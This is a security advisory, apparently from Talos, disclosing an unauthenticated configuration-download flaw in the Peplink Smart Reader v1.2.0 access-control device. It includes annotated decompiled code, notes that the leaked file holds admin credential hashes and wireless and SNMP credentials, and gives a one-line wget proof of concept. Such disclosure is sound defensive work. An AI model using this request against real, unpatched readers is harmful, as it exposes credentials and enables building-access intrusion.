Talos Vulnerability Report

SUMMARY

An information disclosure vulnerability exists in the web interface /cgi-bin/download_config.cgi functionality of Peplink Smart Reader v1.2.0 (in QEMU). A specially crafted HTTP request can lead to a disclosure of sensitive information. An attacker can make an unauthenticated HTTP request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Peplink Smart Reader v1.2.0 (in QEMU)

PRODUCT URLS

Smart Reader - https://www.peplinkworks.com/Smart-Reader.asp

CVSSv3 SCORE

5.3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CWE

CWE-284 - Improper Access Control

DETAILS

The Peplink Smart Reader is the access-control hardware associated with the PepXIM Time-Logging and Security System. It is used to manage access to buildings, workstations and public transit, as well as for employee time management.

The Peplink Smart Reader exposes a web server on ports 80 and 443 intended for local configuration and control of the card reader. This web server exposes an unauthenticated endpoint at /cgi-bin/download_config.cgi used for downloading the active configuration file for the device. Requests destined for this endpoint will be handled by the function at offset 0x431ab0 of the /web/cgi-bin/download_config.cgi binary.

This entry point function is relatively simple and does not implement any authentication.

00431ab0  int32_t sub_431ab0()
00431ab0  {
00431acc      puts("HTTP/1.0 200 OK");
00431ad8      sub_431908("/tmp/config.bin");
00431ae8      return 0;
00431ae8  }

Further reversing of the sub_431908 function identifies that no authentication checks occur for this request. Below is an annotated decompilation of this function.

00431908  void sub_431908(char* filepath)
00431908  {
00431934      unlink("/tmp/config.txt");
00431958      char command[0x100];
00431958
00431958      // [1] Copy active config into /tmp/config.txt for enciphering
00431958      sprintf(&command, "cp -p %s %s", "/etc/masterconfig.applied", "/tmp/config.txt", 0x49c5d0);
00431970      system(&command);
00431980      unlink("/tmp/config.bin");
00431980
004318a8      // [2] Archive, compress and XOR encode the configuration file
004318a8      char encipher_command[0x100];
004318e4      sprintf(&encipher_command, "cd %s ; tar cf - %s | gzip - -c 2>/dev/null | xor > %s ; cd -) > /dev/null", "/tmp", "config.txt", "/tmp/config.bin");
00431900      system(&encipher_command);
00431900
004319a4      // [3] Determine the file size of the file to be downloaded and place it into the HTTP response headers
004319a4      struct FILE* config_fp = fopen("/tmp/config.bin", "rb");
004319b0      int32_t config_len;
004319b0      if (config_fp == 0)
004319b0      {
00431aac          config_len = 0;
00431aac      }
004319c4      else
004319c4      {
004319c4          fseek(config_fp, 0, 2);
004319ec          config_len = ftell(config_fp);
004319e8          fclose(config_fp);
004319e8      }
004319fc      puts("Content-disposition: attachment;…");
00431a10      puts("Content-Location: "config.bin"");
00431a28      printf("Content-Length: %d\n", config_len);
00431a3c      puts("Content-type: application/octet-…");
00431a3c
00431a50      // [4] Transmit the resulting file to the unauthenticated user
00431a50      struct FILE* enciphered_fp = fopen(filepath, "rb");
00431a5c      if (enciphered_fp != 0)
00431a5c      {
00431a64          HTTP_transmit_file(enciphered_fp);
00431a74          fclose(enciphered_fp);
00431a74      }
00431a88      fflush(*(uint32_t*)stdout);
00431a8c  }

This function effectively executes two shell commands to ([1]) copy the active configuration file into /tmp/config.txt and then ([2]) archive, compress and XOR encode the configuration file into /tmp/config.bin. Finally, at [4] the encoded archive is transmitted to the requesting user.

Notably, the contents of the active configuration file contain the administrative user’s username and an MD5 hash of their password, potentially wireless network credentials, network configuration details, SNMP configuration details, etc.

An attacker can cause the device to leak sensitive configuration information by simply making an unauthenticated HTTP request.

Exploit Proof of Concept

wget https://$TARGET/cgi-bin/download_config.cgi --no-check-certificate

VENDOR RESPONSE

The vendor links to new firmware versions at the end of their advisory: https://forum.peplink.com/t/peplink-security-advisory-smart-reader-firmware-1-2-0-cve-2023-43491-cve-2023-45209-cve-2023-39367-cve-2023-45744-cve-2023-40146/47256

TIMELINE

2023-11-30 - Vendor Disclosure
2024-04-17 - Vendor Patch Release
2024-04-17 - Public Release